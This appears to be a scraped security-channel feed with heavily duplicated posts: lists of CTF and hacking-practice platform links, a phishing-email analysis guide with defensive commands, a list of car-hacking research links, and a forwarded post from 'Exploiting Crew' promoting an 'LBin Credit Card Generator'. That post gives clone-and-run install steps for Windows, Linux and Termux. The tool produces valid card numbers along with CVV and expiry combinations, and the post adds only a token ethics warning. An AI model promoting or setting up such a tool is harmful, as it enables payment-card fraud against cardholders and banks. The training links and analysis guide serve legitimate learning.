11. [OverTheWire Wargames](https://overthewire.org/)
12. [CyberSecLabs](https://cyberseclabs.co.uk/)
13. [THM vs HTB Writeups](https://github.com/Ignitetechnologies)
### CTF Challenges & Resources
14. [Cryptohack](https://cryptohack.org/)
15. [WeChall Challenges](https://www.wechall.net/)
16. [Challenges on CTFlearn](https://ctflearn.com/)
17. [W3Challs](https://w3challs.com/)
18. [Hacker101 CTF](https://ctf.hacker101.com/)
19. [Defend the Web](https://defendtheweb.net/)
20. [RingZer0 Team Online CTF](https://ringzer0ctf.com/)
### Tools for Practice
21. [VulnHub](https://www.vulnhub.com/)
22. [TryHackMe GitHub Repository](https://github.com/topics/tryhackme)
23. [CTFd (Create Your Own CTF)](https://ctfd.io/)
24. [CrackStation](https://crackstation.net/)
### Writeups and Blogs
25. [CTF Writeups GitHub](https://github.com/ctfs/write-ups-2019)
26. [TryHackMe Subreddit](https://www.reddit.com/r/tryhackme/)
27. [Hack The Box Subreddit](https://www.reddit.com/r/hackthebox/)
28. [Infosec Writeups on Medium](https://medium.com/bugbountywriteup)
### Learning Resources
29. [Hack This Site](https://www.hackthissite.org/)
30. [Cyber Security Challenge](https://cybersecuritychallenge.org.uk/)
31. [OWASP Juice Shop](https://owasp.org/www-project-juice-shop/)
32. [CTF Field Guide (Trail of Bits)](https://trailofbits.github.io/ctf/)
33. [SANS Holiday Hack Challenge](https://www.sans.org/mlp/holiday-hack-challenge/)
34. [CrackMe Challenges](https://crackmes.one/)
### Forums and Communities
35. [Reddit - r/CTF](https://www.reddit.com/r/CTF/)
36. [InfoSec Community Discord](https://discord.gg/infosec)
37. [Hacker News](https://news.ycombinator.com/)
### Beginner-Friendly
38. [PentesterLab](https://pentesterlab.com/)
39. [Bandit Wargame](https://overthewire.org/wargames/bandit/)
40. [Microcorruption](https://microcorruption.com/)
### Advanced Challenges
41. [Real World CTF](https://realworldctf.com/)
42. [Google CTF](https://capturetheflag.withgoogle.com/)
43. [Flare-On Challenge](https://www.flare-on.com/)
44. [Hack.lu CTF](https://2019.hack.lu/index.html)
### Additional GitHub Resources
45. [Awesome CTF](https://github.com/apsdehal/awesome-ctf)
46. [CTF Wiki](https://ctf-wiki.org/)
47. [HackTricks](https://book.hacktricks.xyz/)
48. [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings)
49. [SecLists](https://github.com/danielmiessler/SecLists)
### Bonus Links
50. [Practice Labs from Security Blue Team](https://securityblue.team/practice/)
### TryHackMe (THM) Links
1. [Official TryHackMe Website](https://tryhackme.com)
2. [TryHackMe Learning Paths](https://tryhackme.com/paths)
3. [Free Rooms on TryHackMe](https://tryhackme.com/free)
4. [TryHackMe Discord Community](https://discord.gg/tryhackme)
5. [TryHackMe Blog](https://blog.tryhackme.com)
6. [GitHub: Awesome TryHackMe Writeups](https://github.com/0xagun/awesome-tryhackme-writeups)
### Popular CTF Platforms
7. [Hack The Box](https://www.hackthebox.com/)
8. [CTFtime](https://ctftime.org/)
9. [PicoCTF](https://picoctf.org/)
10. [Root Me](https://www.root-me.org/)
11. [OverTheWire Wargames](https://overthewire.org/)
12. [CyberSecLabs](https://cyberseclabs.co.uk/)
13. [THM vs HTB Writeups](https://github.com/Ignitetechnologies)
### CTF Challenges & Resources
14. [Cryptohack](https://cryptohack.org/)
15. [WeChall Challenges](https://www.wechall.net/)
16. [Challenges on CTFlearn](https://ctflearn.com/)
17. [W3Challs](https://w3challs.com/)
18. [Hacker101 CTF](https://ctf.hacker101.com/)
19. [Defend the Web](https://defendtheweb.net/)
20. [RingZer0 Team Online CTF](https://ringzer0ctf.com/)
### Tools for Practice
21. [VulnHub](https://www.vulnhub.com/)
22. [TryHackMe GitHub Repository](https://github.com/topics/tryhackme)
23. [CTFd (Create Your Own CTF)](https://ctfd.io/)
24. [CrackStation](https://crackstation.net/)
### Writeups and Blogs
25. [CTF Writeups GitHub](https://github.com/ctfs/write-ups-2019)
26. [TryHackMe Subreddit](https://www.reddit.com/r/tryhackme/)
27. [Hack The Box Subreddit](https://www.reddit.com/r/hackthebox/)
28. [Infosec Writeups on Medium](https://medium.com/bugbountywriteup)
### Learning Resources
29. [Hack This Site](https://www.hackthissite.org/)
30. [Cyber Security Challenge](https://cybersecuritychallenge.org.uk/)
31. [OWASP Juice Shop](https://owasp.org/www-project-juice-shop/)
32. [CTF Field Guide (Trail of Bits)](https://trailofbits.github.io/ctf/)
33. [SANS Holiday Hack Challenge](https://www.sans.org/mlp/holiday-hack-challenge/)
34. [CrackMe Challenges](https://crackmes.one/)
### Forums and Communities
35. [Reddit - r/CTF](https://www.reddit.com/r/CTF/)
36. [InfoSec Community Discord](https://discord.gg/infosec)
37. [Hacker News](https://news.ycombinator.com/)
### Beginner-Friendly
38. [PentesterLab](https://pentesterlab.com/)
39. [Bandit Wargame](https://overthewire.org/wargames/bandit/)
40. [Microcorruption](https://microcorruption.com/)
### Advanced Challenges
41. [Real World CTF](https://realworldctf.com/)
42. [Google CTF](https://capturetheflag.withgoogle.com/)
43. [Flare-On Challenge](https://www.flare-on.com/)
44. [Hack.lu CTF](https://2019.hack.lu/index.html)
### Additional GitHub Resources
45. [Awesome CTF](https://github.com/apsdehal/awesome-ctf)
46. [CTF Wiki](https://ctf-wiki.org/)
47. [HackTricks](https://book.hacktricks.xyz/)
48. [Payloads All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings)
49. [SecLists](https://github.com/danielmiessler/SecLists)
### Bonus Links
50. [Practice Labs from Security Blue Team](https://securityblue.team/practice/)
TryHackMe
TryHackMe | Cyber Security Training
TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
🦑Phishing email analysis:
1. Mail Header Analysis
- Tool:
- Usage: Extract and analyze email headers to trace the source.
2. Link Analysis
- Tool:
- Usage: Check if links are flagged as malicious.
3. Attachment Analysis
- Tool:
- Usage: Scan attachments for malware.
4. Text Analysis
- Tool:
- Usage: Extract and analyze suspicious text patterns.
5. Complete Email Analysis
- Tool:
- Description: Use this open-source framework to analyze and share Indicators of Compromise (IOCs).
6. Sandbox Analysis
- Tool:
- Usage: Isolate and run suspicious files or links for dynamic analysis.
Installation Example
For ClamAV:
1. Mail Header Analysis
- Tool:
exiftool or mha-parser- Usage: Extract and analyze email headers to trace the source.
exiftool email.eml
2. Link Analysis
- Tool:
urlscan.io CLI or PhishTank API- Usage: Check if links are flagged as malicious.
curl -X POST --data-urlencode 'url=http://example.com' https://urlscan.io/api/v1/scan/
3. Attachment Analysis
- Tool:
ClamAV- Usage: Scan attachments for malware.
clamscan attachment.zip
4. Text Analysis
- Tool:
strings or grep- Usage: Extract and analyze suspicious text patterns.
strings email.eml | grep -i "password"
5. Complete Email Analysis
- Tool:
PyMISP- Description: Use this open-source framework to analyze and share Indicators of Compromise (IOCs).
6. Sandbox Analysis
- Tool:
Cuckoo Sandbox- Usage: Isolate and run suspicious files or links for dynamic analysis.
Installation Example
For ClamAV:
sudo apt update
sudo apt install clamav
sudo freshclam # Update virus definitions
Forwarded from Exploiting Crew (Pr1vAt3)
🦑 LBin Credit Card Generator: (Android/Linux/Windows)
The LBin Credit Card Generator is a Python-based tool used for generating valid credit and debit card numbers. It provides details about the bank and the card number, along with the ability to generate combinations of 3-digit codes and expiry dates.
⚠️ Ethical Use Warning
This tool should only be used for ethical purposes. Unauthorized generation and use of credit card numbers is illegal and unethical.
📋 Quick Start Guide
#### Windows Installation
1. Install Git
Download Git for Windows [here](https://git-scm.com/download/win). Ensure you select the option to add Git to the system PATH during installation.
2. Install Python
Download Python [here](https://www.python.org/downloads/), making sure to check the "Add Python to PATH" option during installation.
3. Clone the Repository
Open the command prompt and clone the repository:
4. Navigate to the Project Directory
5. Run the Script
Linux Installation
1. Clone the Repository
2. Navigate to the Project Directory
3. Add Execution Permissions
4. Run the Script
#### Termux (Android) Installation
1. Install Termux
Download and install [Termux](https://play.google.com/store/apps/details?id=com.termux) from the Google Play Store.
2. Install Git
3. Install Python
4. Clone the Repository
5. Navigate to the Project Directory
6. Add Execution Permissions
7. Run the Script
💻 Supported Operating Systems
- Windows 💻
- Linux 🐧
- Termux (Android) 📱
The LBin Credit Card Generator is a Python-based tool used for generating valid credit and debit card numbers. It provides details about the bank and the card number, along with the ability to generate combinations of 3-digit codes and expiry dates.
⚠️ Ethical Use Warning
This tool should only be used for ethical purposes. Unauthorized generation and use of credit card numbers is illegal and unethical.
📋 Quick Start Guide
#### Windows Installation
1. Install Git
Download Git for Windows [here](https://git-scm.com/download/win). Ensure you select the option to add Git to the system PATH during installation.
2. Install Python
Download Python [here](https://www.python.org/downloads/), making sure to check the "Add Python to PATH" option during installation.
3. Clone the Repository
Open the command prompt and clone the repository:
git clone https://github.com/lalaio1/LBin-CC-generator-.git
4. Navigate to the Project Directory
cd LBin-CC-generator-
5. Run the Script
python start.py
Linux Installation
1. Clone the Repository
git clone https://github.com/lalaio1/LBin-CC-generator-.git
2. Navigate to the Project Directory
cd LBin-CC-generator-
3. Add Execution Permissions
chmod +x start.py
4. Run the Script
python3 start.py
#### Termux (Android) Installation
1. Install Termux
Download and install [Termux](https://play.google.com/store/apps/details?id=com.termux) from the Google Play Store.
2. Install Git
pkg install git
3. Install Python
pkg install python3
4. Clone the Repository
git clone https://github.com/lalaio1/LBin-CC-generator-.git
5. Navigate to the Project Directory
cd LBin-CC-generator-
6. Add Execution Permissions
chmod +x start.py
7. Run the Script
python3 start.py
💻 Supported Operating Systems
- Windows 💻
- Linux 🐧
- Termux (Android) 📱
Python.org
Download Python
The official home of the Python Programming Language
Forwarded from Exploiting Crew (Pr1vAt3)
🦑Cars Hacking Utilities:
- [How to hack a car — a quick crash-course](https://medium.freecodecamp.org/hacking-cars-a-guide-tutorial-on-how-to-hack-a-car-5eafcfbbb7ec) - Car enthusiast Kenny Kuchera illustrates just enough information to get you up and running. An excellent resource for first timers!
- [Stopping a Jeep Cherokee on the Highway Remotely](https://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/) - Chris Valasek's and Charlie Miller's pivotal research on hacking into Jeep's presented at DEFCON in 2015.
- [Troy Hunt on Controlling Nissans](https://www.troyhunt.com/controlling-vehicle-features-of-nissan/) - Troy Hunt goes into controlling Nissan vehicles.
- [Tesla hackers explain how they did it at Defcon](http://www.cnet.com/roadshow/news/tesla-hackers-explain-how-they-did-it-at-def-con-23/) - Overview of DEFCON 23 presentation on hacking into Tesla cars.
- [Anatomy of the Rolljam Wireless Car Hack](http://makezine.com/2015/08/11/anatomy-of-the-rolljam-wireless-car-hack/) - Overview of the RollJam rolling code exploitation device.
- [IOActive's Tools and Data](http://blog.ioactive.com/2013/08/car-hacking-content.html) - Chris Valasek and Charlie Miller release some of their tools and data for hacking into vehicles in an effort to get more people into vehicle security research.
- [Developments in Car Hacking](https://www.sans.org/reading-room/whitepapers/ICS/developments-car-hacking-36607) - via the SANS Reading Room, Currie's paper analyses the risks and perils of smart vehicle technology.
- [Car Hacking on the Cheap](http://www.ioactive.com/pdfs/IOActive_Car_Hacking_Poories.pdf) - A whitepaper from Chris Valasek and IOActive on hacking your car when you don't have a lot of resources at your disposal.
- [Car Hacking: The definitive source](http://illmatics.com/carhacking.html) - Charlie Miller and Chris Valasek publish all tools, data, research notes, and papers for everyone for free
- [Car Hacking on the cheap](https://community.rapid7.com/community/transpo-security/blog/2017/02/08/car-hacking-on-the-cheap) - Craig Smith wrote a brief article on working with Metasploit’s HWBrige using ELM327 Bluetooth dongle
- [Researchers tackle autonomous vehicle security](https://phys.org/news/2017-05-tackle-autonomous-vehicle.html) - Texas A&M researchers develop intelligence system prototype.
- [Reverse engineering of the Nitro OBD2](https://blog.quarkslab.com/reverse-engineering-of-the-nitro-obd2.html) - Reverse engineering of CAN diagnostic tools.
- [Analysis of an old Subaru Impreza - Subaru Select Monitor v1 (SSM1)](https://p1kachu.pluggi.fr/project/automotive/2018/12/28/subaru-ssm1/) - Digging into an old ECU through an old protocol and disabling a 1997 Subaru Impreza's speed limiter.
- [Car Hacking in 30 Minutes or Less](https://brysonpayne.com/2018/10/20/start-car-hacking-in-30-minutes-or-less/) - Using VirtualBox and Kali Linux, you can start car hacking using completely free open-source software and tools, including can-utils, ICSim, ScanTool, Wireshark, and tcpdump
Source
- [How to hack a car — a quick crash-course](https://medium.freecodecamp.org/hacking-cars-a-guide-tutorial-on-how-to-hack-a-car-5eafcfbbb7ec) - Car enthusiast Kenny Kuchera illustrates just enough information to get you up and running. An excellent resource for first timers!
- [Stopping a Jeep Cherokee on the Highway Remotely](https://www.wired.com/2015/07/hackers-remotely-kill-jeep-highway/) - Chris Valasek's and Charlie Miller's pivotal research on hacking into Jeep's presented at DEFCON in 2015.
- [Troy Hunt on Controlling Nissans](https://www.troyhunt.com/controlling-vehicle-features-of-nissan/) - Troy Hunt goes into controlling Nissan vehicles.
- [Tesla hackers explain how they did it at Defcon](http://www.cnet.com/roadshow/news/tesla-hackers-explain-how-they-did-it-at-def-con-23/) - Overview of DEFCON 23 presentation on hacking into Tesla cars.
- [Anatomy of the Rolljam Wireless Car Hack](http://makezine.com/2015/08/11/anatomy-of-the-rolljam-wireless-car-hack/) - Overview of the RollJam rolling code exploitation device.
- [IOActive's Tools and Data](http://blog.ioactive.com/2013/08/car-hacking-content.html) - Chris Valasek and Charlie Miller release some of their tools and data for hacking into vehicles in an effort to get more people into vehicle security research.
- [Developments in Car Hacking](https://www.sans.org/reading-room/whitepapers/ICS/developments-car-hacking-36607) - via the SANS Reading Room, Currie's paper analyses the risks and perils of smart vehicle technology.
- [Car Hacking on the Cheap](http://www.ioactive.com/pdfs/IOActive_Car_Hacking_Poories.pdf) - A whitepaper from Chris Valasek and IOActive on hacking your car when you don't have a lot of resources at your disposal.
- [Car Hacking: The definitive source](http://illmatics.com/carhacking.html) - Charlie Miller and Chris Valasek publish all tools, data, research notes, and papers for everyone for free
- [Car Hacking on the cheap](https://community.rapid7.com/community/transpo-security/blog/2017/02/08/car-hacking-on-the-cheap) - Craig Smith wrote a brief article on working with Metasploit’s HWBrige using ELM327 Bluetooth dongle
- [Researchers tackle autonomous vehicle security](https://phys.org/news/2017-05-tackle-autonomous-vehicle.html) - Texas A&M researchers develop intelligence system prototype.
- [Reverse engineering of the Nitro OBD2](https://blog.quarkslab.com/reverse-engineering-of-the-nitro-obd2.html) - Reverse engineering of CAN diagnostic tools.
- [Analysis of an old Subaru Impreza - Subaru Select Monitor v1 (SSM1)](https://p1kachu.pluggi.fr/project/automotive/2018/12/28/subaru-ssm1/) - Digging into an old ECU through an old protocol and disabling a 1997 Subaru Impreza's speed limiter.
- [Car Hacking in 30 Minutes or Less](https://brysonpayne.com/2018/10/20/start-car-hacking-in-30-minutes-or-less/) - Using VirtualBox and Kali Linux, you can start car hacking using completely free open-source software and tools, including can-utils, ICSim, ScanTool, Wireshark, and tcpdump
Source
freeCodeCamp
How to hack a car — a quick crash-course
The goal of this article is to get you started hacking cars — fast, cheap, and easy. In order to do this, we’ll spoof the RPM gauge as an…